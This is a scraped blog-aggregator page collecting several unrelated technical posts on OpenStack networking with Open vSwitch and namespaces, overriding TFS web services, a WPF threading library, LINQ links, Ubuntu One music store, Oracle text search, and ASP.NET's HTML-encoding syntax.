(we will discuss the exact connectivity later in the series). Here is how OVS looks after a VM was launched: # ovs-vsctl show efd98c87-dc62-422d-8f73-a68c2a14e73d     Bridge br-int         Port "int-br-eth2"             Interface "int-br-eth2"         Port br-int             Interface br-int type: internal         Port "qvocb64ea96-9f" tag: 1             Interface "qvocb64ea96-9f"     Bridge "br-eth2"         Port "phy-br-eth2"             Interface "phy-br-eth2"         Port "br-eth2"             Interface "br-eth2" type: internal         Port "eth2"             Interface "eth2" ovs_version: "1.11.0" Bridge "br-int" now has a new port "qvocb64ea96-9f" which connects to the VM and tagged with VLAN 1. Every VM which will be launched will add a port on the “br-int” bridge for every network interface the VM has. Another useful command on OVS is dump-flows for example: # ovs-ofctl dump-flows br-int NXST_FLOW reply (xid=0x4): cookie=0x0, duration=735.544s, table=0, n_packets=70, n_bytes=9976, idle_age=17, priority=3,in_port=1,dl_vlan=1000 actions=mod_vlan_vid:1,NORMAL cookie=0x0, duration=76679.786s, table=0, n_packets=0, n_bytes=0, idle_age=65534, hard_age=65534, priority=2,in_port=1 actions=drop cookie=0x0, duration=76681.36s, table=0, n_packets=68, n_bytes=7950, idle_age=17, hard_age=65534, priority=1 actions=NORMAL As we see the port which is connected to the VM has the VLAN tag 1. However the port on the VM network (eth2) will be using tag 1000. OVS is modifying the vlan as the packet flow from the VM to the physical interface. In OpenStack the Open vSwitch agent takes care of programming the flows in Open vSwitch so the users do not have to deal with this at all. If you wish to learn more about how to program the Open vSwitch you can read more about it at http://openvswitch.org looking at the documentation describing the ovs-ofctl command. Network Namespaces (netns) Network namespaces is a very cool Linux feature can be used for many purposes and is heavily used in OpenStack networking. Network namespaces are isolated containers which can hold a network configuration and is not seen from outside of the namespace. A network namespace can be used to encapsulate specific network functionality or provide a network service in isolation as well as simply help to organize a complicated network setup. Using the Oracle OpenStack Tech Preview we are using the latest Unbreakable Enterprise Kernel R3 (UEK3), this kernel provides a complete support for netns. Let's see how namespaces work through couple of examples to control network namespaces we use the ip netns command: Defining a new namespace: # ip netns add my-ns # ip netns list my-ns As mentioned the namespace is an isolated container, we can perform all the normal actions in the namespace context using the exec command for example running the ifconfig command: # ip netns exec my-ns ifconfig -a lo        Link encap:Local Loopback           LOOPBACK  MTU:16436 Metric:1           RX packets:0 errors:0 dropped:0 overruns:0 frame:0           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0           RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b) We can run every command in the namespace context, this is especially useful for debug using tcpdump command, we can ping or ssh or define iptables all within the namespace. Connecting the namespace to the outside world: There are various ways to connect into a namespaces and between namespaces we will focus on how this is done in OpenStack. OpenStack uses a combination of Open vSwitch and network namespaces. OVS defines the interfaces and then we can add those interfaces to namespace. So first let's add a bridge to OVS: # ovs-vsctl add-br my-bridge Now let's add a port on the OVS and make it internal: # ovs-vsctl add-port my-bridge my-port # ovs-vsctl set Interface my-port type=internal And let's connect it into the namespace: # ip link set my-port netns my-ns Looking inside the namespace: # ip netns exec my-ns ifconfig -a lo        Link encap:Local Loopback           LOOPBACK  MTU:65536 Metric:1           RX packets:0 errors:0 dropped:0 overruns:0 frame:0           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0           RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b) my-port   Link encap:Ethernet HWaddr 22:04:45:E2:85:21           BROADCAST  MTU:1500 Metric:1           RX packets:0 errors:0 dropped:0 overruns:0 frame:0           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0           RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b) Now we can add more ports to the OVS bridge and connect it to other namespaces or other device like physical interfaces. Neutron is using network namespaces to implement network services such as DCHP, routing, gateway, firewall, load balance and more. In the next post we will go into this in further details. Linux Bridge and veth pairs Linux bridge is used to connect the port from OVS to the VM. Every port goes from the OVS bridge to a Linux bridge and from there to the VM. The reason for using regular Linux bridges is for security groups’ enforcement. Security groups are implemented using iptables and iptables can only be applied to Linux bridges and not to OVS bridges. Veth pairs are used extensively throughout the network setup in OpenStack and are also a good tool to debug a network problem. Veth pairs are simply a virtual wire and so veths always come in pairs. Typically one side of the veth pair will connect to a bridge and the other side to another bridge or simply left as a usable interface. In this example we will create some veth pairs, connect them to bridges and test connectivity. This example is using regular Linux server and not an OpenStack node: Creating a veth pair, note that we define names for both ends: # ip link add veth0 type veth peer name veth1 # ifconfig -a . . veth0     Link encap:Ethernet HWaddr 5E:2C:E6:03:D0:17           BROADCAST MULTICAST  MTU:1500 Metric:1           RX packets:0 errors:0 dropped:0 overruns:0 frame:0           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000           RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b) veth1     Link encap:Ethernet HWaddr E6:B6:E2:6D:42:B8           BROADCAST MULTICAST  MTU:1500 Metric:1           RX packets:0 errors:0 dropped:0 overruns:0 frame:0           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000           RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b) . . To make the example more meaningful this we will create the following setup: veth0 => veth1 => br-eth3 => eth3 ======> eth2 on another Linux server br-eth3 – a regular Linux bridge which will be connected to veth1 and eth3 eth3 – a physical interface with no IP on it, connected to a private network eth2 – a physical interface on the remote Linux box connected to the private network and configured with the IP of 50.50.50.1 Once we create the setup we will ping 50.50.50.1 (the remote IP) through veth0 to test that the connection is up: # brctl addbr br-eth3 # brctl addif br-eth3 eth3 # brctl addif br-eth3 veth1 # brctl show bridge name     bridge id               STP enabled     interfaces br-eth3         8000.00505682e7f6       no              eth3                                                         veth1 # ifconfig veth0 50.50.50.50 # ping -I veth0 50.50.50.51 PING 50.50.50.51 (50.50.50.51) from 50.50.50.50 veth0: 56(84) bytes of data. 64 bytes from 50.50.50.51: icmp_seq=1 ttl=64 time=0.454 ms 64 bytes from 50.50.50.51: icmp_seq=2 ttl=64 time=0.298 ms When the naming is not as obvious as the previous example and we don't know who are the paired veth interfaces we can use the ethtool command to figure this out. The ethtool command returns an index we can look up using ip link command, for example: # ethtool -S veth1 NIC statistics: peer_ifindex: 12 # ip link . . 12: veth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000 Summary That’s all for now, we quickly reviewed OVS, network namespaces, Linux bridges and veth pairs. These components are heavily used in the OpenStack network architecture we are exploring and understanding them well will be very useful when reviewing the different use cases. In the next post we will look at how the OpenStack network is laid out connecting the virtual machines to each other and to the external world. @RonenKofman

    Read the article

  • Overwriting TFS Web Services

    - by javarg
    In this blog I will share a technique I used to intercept TFS Web Services calls. This technique is a very invasive one and requires you to overwrite default TFS Web Services behavior. I only recommend taking such an approach when other means of TFS extensibility fail to provide the same functionality (this is not a supported TFS extensibility point). For instance, intercepting and aborting a Work Item change operation could be implemented using this approach (consider TFS Subscribers functionality before taking this approach, check Martin’s post about subscribers). So let’s get started. The technique consists in versioning TFS Web Services .asmx service classes. If you look into TFS’s ASMX services you will notice that versioning is supported by creating a class hierarchy between different product versions. For instance, let’s take the Work Item management service .asmx. Check the following .asmx file located at: %Program Files%\Microsoft Team Foundation Server 2010\Application Tier\Web Services\_tfs_resources\WorkItemTracking\v3.0\ClientService.asmx The .asmx references the class Microsoft.TeamFoundation.WorkItemTracking.Server.ClientService3: <%-- Copyright (c) Microsoft Corporation. All rights reserved. --%> <%@ webservice language="C#" Class="Microsoft.TeamFoundation.WorkItemTracking.Server.ClientService3" %> .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } The inheritance hierarchy for this service class follows: Note the naming convention used for service versioning (ClientService3, ClientService2, ClientService). We will need to overwrite the latest service version provided by the product (in this case ClientService3 for TFS 2010). The following example intercepts and analyzes WorkItem fields. Suppose we need to validate state changes with more advanced logic other than the provided validations/constraints of the process template. Important: Backup the original .asmx file and create one of your own. Create a Visual Studio Web App Project and include a new ASMX Web Service in the project Add the following references to the project (check the folder %Program Files%\Microsoft Team Foundation Server 2010\Application Tier\Web Services\bin\): Microsoft.TeamFoundation.Framework.Server.dll Microsoft.TeamFoundation.Server.dll Microsoft.TeamFoundation.Server.dll Microsoft.TeamFoundation.WorkItemTracking.Client.QueryLanguage.dll Microsoft.TeamFoundation.WorkItemTracking.Server.DataAccessLayer.dll Microsoft.TeamFoundation.WorkItemTracking.Server.DataServices.dll Replace the default service implementation with the something similar to the following code: Code Snippet /// <summary> /// Inherit from ClientService3 to overwrite default Implementation /// </summary> [WebService(Namespace = "http://schemas.microsoft.com/TeamFoundation/2005/06/WorkItemTracking/ClientServices/03", Description = "Custom Team Foundation WorkItemTracking ClientService Web Service")] public class CustomTfsClientService : ClientService3 {     [WebMethod, SoapHeader("requestHeader", Direction = SoapHeaderDirection.In)]     public override bool BulkUpdate(         XmlElement package,         out XmlElement result,         MetadataTableHaveEntry[] metadataHave,         out string dbStamp,         out Payload metadata)     {         var xe = XElement.Parse(package.OuterXml);         // We only intercept WorkItems Updates (we can easily extend this sample to capture any operation).         var wit = xe.Element("UpdateWorkItem");         if (wit != null)         {             if (wit.Attribute("WorkItemID") != null)             {                 int witId = (int)wit.Attribute("WorkItemID");                 // With this Id. I can query TFS for more detailed information, using TFS Client API (assuming the WIT already exists).                 var stateChanged =                     wit.Element("Columns").Elements("Column").FirstOrDefault(c => (string)c.Attribute("Column") == "System.State");                 if (stateChanged != null)                 {                     var newStateName = stateChanged.Element("Value").Value;                     if (newStateName == "Resolved")                     {                         throw new Exception("Cannot change state to Resolved!");                     }                 }             }         }         // Finally, we call base method implementation         return base.BulkUpdate(package, out result, metadataHave, out dbStamp, out metadata);     } } .csharpcode, .csharpcode pre { font-size: small; color: black; font-family: consolas, "Courier New", courier, monospace; background-color: #ffffff; /*white-space: pre;*/ } .csharpcode pre { margin: 0em; } .csharpcode .rem { color: #008000; } .csharpcode .kwrd { color: #0000ff; } .csharpcode .str { color: #006080; } .csharpcode .op { color: #0000c0; } .csharpcode .preproc { color: #cc6633; } .csharpcode .asp { background-color: #ffff00; } .csharpcode .html { color: #800000; } .csharpcode .attr { color: #ff0000; } .csharpcode .alt { background-color: #f4f4f4; width: 100%; margin: 0em; } .csharpcode .lnum { color: #606060; } 4. Build your solution and overwrite the original .asmx with the new implementation referencing our new service version (don’t forget to backup it up first). 5. Copy your project’s .dll into the following path: %Program Files%\Microsoft Team Foundation Server 2010\Application Tier\Web Services\bin 6. Try saving a WorkItem into the Resolved state. Enjoy!

    Read the article

  • ParallelWork: Feature rich multithreaded fluent task execution library for WPF

    - by oazabir
    ParallelWork is an open source free helper class that lets you run multiple work in parallel threads, get success, failure and progress update on the WPF UI thread, wait for work to complete, abort all work (in case of shutdown), queue work to run after certain time, chain parallel work one after another. It’s more convenient than using .NET’s BackgroundWorker because you don’t have to declare one component per work, nor do you need to declare event handlers to receive notification and carry additional data through private variables. You can safely pass objects produced from different thread to the success callback. Moreover, you can wait for work to complete before you do certain operation and you can abort all parallel work while they are in-flight. If you are building highly responsive WPF UI where you have to carry out multiple job in parallel yet want full control over those parallel jobs completion and cancellation, then the ParallelWork library is the right solution for you. I am using the ParallelWork library in my PlantUmlEditor project, which is a free open source UML editor built on WPF. You can see some realistic use of the ParallelWork library there. Moreover, the test project comes with 400 lines of Behavior Driven Development flavored tests, that confirms it really does what it says it does. The source code of the library is part of the “Utilities” project in PlantUmlEditor source code hosted at Google Code. The library comes in two flavors, one is the ParallelWork static class, which has a collection of static methods that you can call. Another is the Start class, which is a fluent wrapper over the ParallelWork class to make it more readable and aesthetically pleasing code. ParallelWork allows you to start work immediately on separate thread or you can queue a work to start after some duration. You can start an immediate work in a new thread using the following methods: void StartNow(Action doWork, Action onComplete) void StartNow(Action doWork, Action onComplete, Action<Exception> failed) For example, ParallelWork.StartNow(() => { workStartedAt = DateTime.Now; Thread.Sleep(howLongWorkTakes); }, () => { workEndedAt = DateTime.Now; }); Or you can use the fluent way Start.Work: Start.Work(() => { workStartedAt = DateTime.Now; Thread.Sleep(howLongWorkTakes); }) .OnComplete(() => { workCompletedAt = DateTime.Now; }) .Run(); Besides simple execution of work on a parallel thread, you can have the parallel thread produce some object and then pass it to the success callback by using these overloads: void StartNow<T>(Func<T> doWork, Action<T> onComplete) void StartNow<T>(Func<T> doWork, Action<T> onComplete, Action<Exception> fail) For example, ParallelWork.StartNow<Dictionary<string, string>>( () => { test = new Dictionary<string,string>(); test.Add("test", "test"); return test; }, (result) => { Assert.True(result.ContainsKey("test")); }); Or, the fluent way: Start<Dictionary<string, string>>.Work(() => { test = new Dictionary<string, string>(); test.Add("test", "test"); return test; }) .OnComplete((result) => { Assert.True(result.ContainsKey("test")); }) .Run(); You can also start a work to happen after some time using these methods: DispatcherTimer StartAfter(Action onComplete, TimeSpan duration) DispatcherTimer StartAfter(Action doWork,Action onComplete,TimeSpan duration) You can use this to perform some timed operation on the UI thread, as well as perform some operation in separate thread after some time. ParallelWork.StartAfter( () => { workStartedAt = DateTime.Now; Thread.Sleep(howLongWorkTakes); }, () => { workCompletedAt = DateTime.Now; }, waitDuration); Or, the fluent way: Start.Work(() => { workStartedAt = DateTime.Now; Thread.Sleep(howLongWorkTakes); }) .OnComplete(() => { workCompletedAt = DateTime.Now; }) .RunAfter(waitDuration);   There are several overloads of these functions to have a exception callback for handling exceptions or get progress update from background thread while work is in progress. For example, I use it in my PlantUmlEditor to perform background update of the application. // Check if there's a newer version of the app Start<bool>.Work(() => { return UpdateChecker.HasUpdate(Settings.Default.DownloadUrl); }) .OnComplete((hasUpdate) => { if (hasUpdate) { if (MessageBox.Show(Window.GetWindow(me), "There's a newer version available. Do you want to download and install?", "New version available", MessageBoxButton.YesNo, MessageBoxImage.Information) == MessageBoxResult.Yes) { ParallelWork.StartNow(() => { var tempPath = System.IO.Path.Combine( Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Settings.Default.SetupExeName); UpdateChecker.DownloadLatestUpdate(Settings.Default.DownloadUrl, tempPath); }, () => { }, (x) => { MessageBox.Show(Window.GetWindow(me), "Download failed. When you run next time, it will try downloading again.", "Download failed", MessageBoxButton.OK, MessageBoxImage.Warning); }); } } }) .OnException((x) => { MessageBox.Show(Window.GetWindow(me), x.Message, "Download failed", MessageBoxButton.OK, MessageBoxImage.Exclamation); }); The above code shows you how to get exception callbacks on the UI thread so that you can take necessary actions on the UI. Moreover, it shows how you can chain two parallel works to happen one after another. Sometimes you want to do some parallel work when user does some activity on the UI. For example, you might want to save file in an editor while user is typing every 10 second. In such case, you need to make sure you don’t start another parallel work every 10 seconds while a work is already queued. You need to make sure you start a new work only when there’s no other background work going on. Here’s how you can do it: private void ContentEditor_TextChanged(object sender, EventArgs e) { if (!ParallelWork.IsAnyWorkRunning()) { ParallelWork.StartAfter(SaveAndRefreshDiagram, TimeSpan.FromSeconds(10)); } } If you want to shutdown your application and want to make sure no parallel work is going on, then you can call the StopAll() method. ParallelWork.StopAll(); If you want to wait for parallel works to complete without a timeout, then you can call the WaitForAllWork(TimeSpan timeout). It will block the current thread until the all parallel work completes or the timeout period elapses. result = ParallelWork.WaitForAllWork(TimeSpan.FromSeconds(1)); The result is true, if all parallel work completed. If it’s false, then the timeout period elapsed and all parallel work did not complete. For details how this library is built and how it works, please read the following codeproject article: ParallelWork: Feature rich multithreaded fluent task execution library for WPF http://www.codeproject.com/KB/WPF/parallelwork.aspx If you like the article, please vote for me.

    Read the article

  • Linq Tutorial

    - by SAMIR BHOGAYTA
    Microsoft LINQ Tutorials http://www.deitel.com/ResourceCenters/Programming/MicrosoftLINQ/Tutorials/tabid/2673/Default.aspx Introducing C# 3 – Part 4 LINQ http://www.programmersheaven.com/2/CSharp3-4 101 LINQ Samples http://msdn.microsoft.com/en-us/vcsharp/aa336746.aspx What is LinQ http://www.dotnetspider.com/forum/173039-what-linq-net.aspx Beginners Guides http://www.progtalk.com/viewarticle.aspx?articleid=68 http://www.programmersheaven.com/2/CSharp3-4 http://dotnetslackers.com/articles/csharp/introducinglinq1.aspx Using Linq http://weblogs.asp.net/scottgu/archive/2006/05/14/446412.aspx Step By Step Articles http://www.codeproject.com/KB/linq/linqtutorial.aspx http://www.codeproject.com/KB/linq/linqtutorial2.aspx http://www.codeproject.com/KB/linq/linqtutorial3.aspx

    Read the article

  • [MISC GEEKERY] Lucid Lynx to Come Loaded with Ubuntu One Music Store

    - by Vivek
    Ubuntu 10.04 (code name Lucid Lynx) will come loaded with the Ubuntu One music store. Rhythmbox will have the Ubuntu One music store integrated in it. It’ll also allow users to download purchased music to their local machine. Ubuntu One Music Store Users will be able to access Ubuntu One music store from the sidebar of Rhythmbox. The music store is a web page that opens in the Rhythmbox player. There are albums listed on the home page of the Ubuntu One music store page. Ubuntu One music store is powered by 7digital, which is a leading digital B2B media delivery company based in London and operating globally. Canonical, the company behind Ubuntu, has partnered with 7digital to bring the music store to it’s users, integrating it with Rhythmbox and it’s cloud storage service UbuntuOne which was launched last year. The home screen of the Ubuntu One music store displays popular albums and functionality to browse and search. You can search for Artists, Tracks, Albums, or a combination of all three. Users will also be able to browse the store alphabetically, or based on different music genres. Once you select a specific artist, all their available albums are arranged in a grid. Once an album is selected, you’ll will be able to download specific songs or the whole album. You’ll also be allowed to preview different songs for 60 seconds. You’ll be able to buy tracks using a credit card or with PayPal. The purchased tracks will be visible under Library \ Purchased from Ubuntu One. The downloaded tracks are also synced with your UbuntuOne account. This means that you’ll be able to access your tracks from any where on the web. The default UbuntuOne account comes with 2 GB free storage, however, you can also purchase additional space if you need it.   All the music is in mp3 format which is not supported by default in Ubuntu. However, you can get mp3 playback functionality using GStreamer multimedia framework. Conclusion All in all the Ubuntu One music store is a positive move to enhance the user experience and also increase the popularity of Canonical in bringing Ubuntu closer to regular users. This would also provide Canonical to make some revenue in collaboration with 7digital. Ubuntu One Music Store Wiki Similar Articles Productive Geek Tips Install GIMP 2.7.1 on Lucid Lynx using PPAExaile 0.3.0 is a Music Player for UbuntuHow to install Spotify in Ubuntu 9.10 using WineAdding extra Repositories on UbuntuSpeed Up Amarok With Large Music Collections TouchFreeze Alternative in AutoHotkey The Icy Undertow Desktop Windows Home Server – Backup to LAN The Clear & Clean Desktop Use This Bookmarklet to Easily Get Albums Use AutoHotkey to Assign a Hotkey to a Specific Window Latest Software Reviews Tinyhacker Random Tips DVDFab 6 Revo Uninstaller Pro Registry Mechanic 9 for Windows PC Tools Internet Security Suite 2010 Open Multiple Links At One Go NachoFoto Searches Images in Real-time Office 2010 Product Guides Google Maps Place marks – Pizza, Guns or Strip Clubs Monitor Applications With Kiwi LocPDF is a Visual PDF Search Tool

    Read the article

  • Parsing Extended Events xml_deadlock_report

    - by Michael Zilberstein
    Jonathan Kehayias and Paul Randall posted more than a year ago great articles on how to monitor historical deadlocks using Extended Events system_health default trace. Both tried to fix on the fly the bug in xml output that caused failures in xml validation. Today I've found out that their version isn't bulletproof either. So here is the fixed one: SELECT CAST ( xest.target_data as XML ) xml_data , * INTO #ring_buffer_data FROM     sys.dm_xe_session_targets xest    INNER...(read more)

    Read the article

  • A couple of nice features when using OracleTextSearch

    - by kyle.hatlestad
    If you have your UCM/URM instance configured to use the Oracle 11g database as the search engine, you can be using OracleTextSearch as the search definition. OracleTextSearch uses the advanced features of Oracle Text for indexing and searching. This includes the ability to specify metadata fields to be optimized for the search index, fast rebuilding, and index optimization. If you are on 10g of UCM, then you'll need to load the OracleTextSearch component that is available in the CS10gR35UpdateBundle component on the support site (patch #6907073). If you are on 11g, no component is needed. Then you specify the search indexer name with the configuration flag of SearchIndexerEngineName=OracleTextSearch. Please see the docs for other configuration settings and setup instructions. So I thought I would highlight a couple of other unique features available with OracleTextSearch. The first is the Drill Down feature. This feature allows you to specify specific metadata fields that will break down the results of that field based on the total results. So in the above graphic, you can see how it broke down the extensions and gives a count for each. Then you just need to click on that link to then drill into that result. This setting is perfect for option list fields and ones with a distinct set of values possible. By default, it will use the fields Type, Security Group, and Account (if enabled). But you can also specify your own fields. In 10g, you can use the following configuration entry: DrillDownFields=xWebsiteObjectType,dExtension,dSecurityGroup,dDocType And in 11g, you can specify it through the Configuration Manager applet. Simply click on the Advanced Search Design, highlight the field to filter, click Edit, and check 'Is a filter category'. The other feature you get with OracleTextSearch are search snippets. These snippets show the occurrence of the search term in context of their usage. This is very similar to how Google displays its results. If you are on 10g, this is enabled by default. If you are on 11g, you need to turn on the feature. The following configuration entry will enable it: OracleTextDisableSearchSnippet=false Once enabled, you can add the snippets to your search results. Go to Change View -> Customize and add a new search result view. In the Available Fields in the Special section, select Snippet and move it to the Main or Additional Information. If you want to include the snippets with the Classic results, you can add the idoc variable of <$srfDocSnippet$> to display them. One caveat is that this can effect search performance on large collections. So plan the infrastructure accordingly.

    Read the article

  • New <%: %> Syntax for HTML Encoding Output in ASP.NET 4 (and ASP.NET MVC 2)

    - by ScottGu
    [In addition to blogging, I am also now using Twitter for quick updates and to share links. Follow me at: twitter.com/scottgu] This is the nineteenth in a series of blog posts I’m doing on the upcoming VS 2010 and .NET 4 release. Today’s post covers a small, but very useful, new syntax feature being introduced with ASP.NET 4 – which is the ability to automatically HTML encode output within code nuggets.  This helps protect your applications and sites against cross-site script injection (XSS) and HTML injection attacks, and enables you to do so using a nice concise syntax. HTML Encoding Cross-site script injection (XSS) and HTML encoding attacks are two of the most common security issues that plague web-sites and applications.  They occur when hackers find a way to inject client-side script or HTML markup into web-pages that are then viewed by other visitors to a site.  This can be used to both vandalize a site, as well as enable hackers to run client-script code that steals cookie data and/or exploits a user’s identity on a site to do bad things. One way to help mitigate against cross-site scripting attacks is to make sure that rendered output is HTML encoded within a page.  This helps ensures that any content that might have been input/modified by an end-user cannot be output back onto a page containing tags like <script> or <img> elements.  ASP.NET applications (especially those using ASP.NET MVC) often rely on using <%= %> code-nugget expressions to render output.  Developers today often use the Server.HtmlEncode() or HttpUtility.Encode() helper methods within these expressions to HTML encode the output before it is rendered.  This can be done using code like below: While this works fine, there are two downsides of it: It is a little verbose Developers often forget to call the HtmlEncode method New <%: %> Code Nugget Syntax With ASP.NET 4 we are introducing a new code expression syntax (<%:  %>) that renders output like <%= %> blocks do – but which also automatically HTML encodes it before doing so.  This eliminates the need to explicitly HTML encode content like we did in the example above.  Instead you can just write the more concise code below to accomplish the same thing: We chose the <%: %> syntax so that it would be easy to quickly replace existing instances of <%= %> code blocks.  It also enables you to easily search your code-base for <%= %> elements to find and verify any cases where you are not using HTML encoding within your application to ensure that you have the correct behavior. Avoiding Double Encoding While HTML encoding content is often a good best practice, there are times when the content you are outputting is meant to be HTML or is already encoded – in which case you don’t want to HTML encode it again.  ASP.NET 4 introduces a new IHtmlString interface (along with a concrete implementation: HtmlString) that you can implement on types to indicate that its value is already properly encoded (or otherwise examined) for displaying as HTML, and that therefore the value should not be HTML-encoded again.  The <%: %> code-nugget syntax checks for the presence of the IHtmlString interface and will not HTML encode the output of the code expression if its value implements this interface.  This allows developers to avoid having to decide on a per-case basis whether to use <%= %> or <%: %> code-nuggets.  Instead you can always use <%: %> code nuggets, and then have any properties or data-types that are already HTML encoded implement the IHtmlString interface. Using ASP.NET MVC HTML Helper Methods with <%: %> For a practical example of where this HTML encoding escape mechanism is useful, consider scenarios where you use HTML helper methods with ASP.NET MVC.  These helper methods typically return HTML.  For example: the Html.TextBox() helper method returns markup like <input type=”text”/>.  With ASP.NET MVC 2 these helper methods now by default return HtmlString types – which indicates that the returned string content is safe for rendering and should not be encoded by <%: %> nuggets.  This allows you to use these methods within both <%= %> code nugget blocks: As well as within <%: %> code nugget blocks: In both cases above the HTML content returned from the helper method will be rendered to the client as HTML – and the <%: %> code nugget will avoid double-encoding it. This enables you to default to always using <%: %> code nuggets instead of <%= %> code blocks within your applications.  If you want to be really hardcore you can even create a build rule that searches your application looking for <%= %> usages and flags any cases it finds as an error to enforce that HTML encoding always takes place. Scaffolding ASP.NET MVC 2 Views When you use VS 2010 (or the free Visual Web Developer 2010 Express) you’ll find that the views that are scaffolded using the “Add View” dialog now by default always use <%: %> blocks when outputting any content.  For example, below I’ve scaffolded a simple “Edit” view for an article object.  Note the three usages of <%: %> code nuggets for the label, textbox, and validation message (all output with HTML helper methods): Summary The new <%: %> syntax provides a concise way to automatically HTML encode content and then render it as output.  It allows you to make your code a little less verbose, and to easily check/verify that you are always HTML encoding content throughout your site.  This can help protect your applications against cross-site script injection (XSS) and HTML injection attacks.  Hope this helps, Scott

    Read the article

< Previous Page | 502 503 504 505 506 507 508 509 510 511 512 513  | Next Page >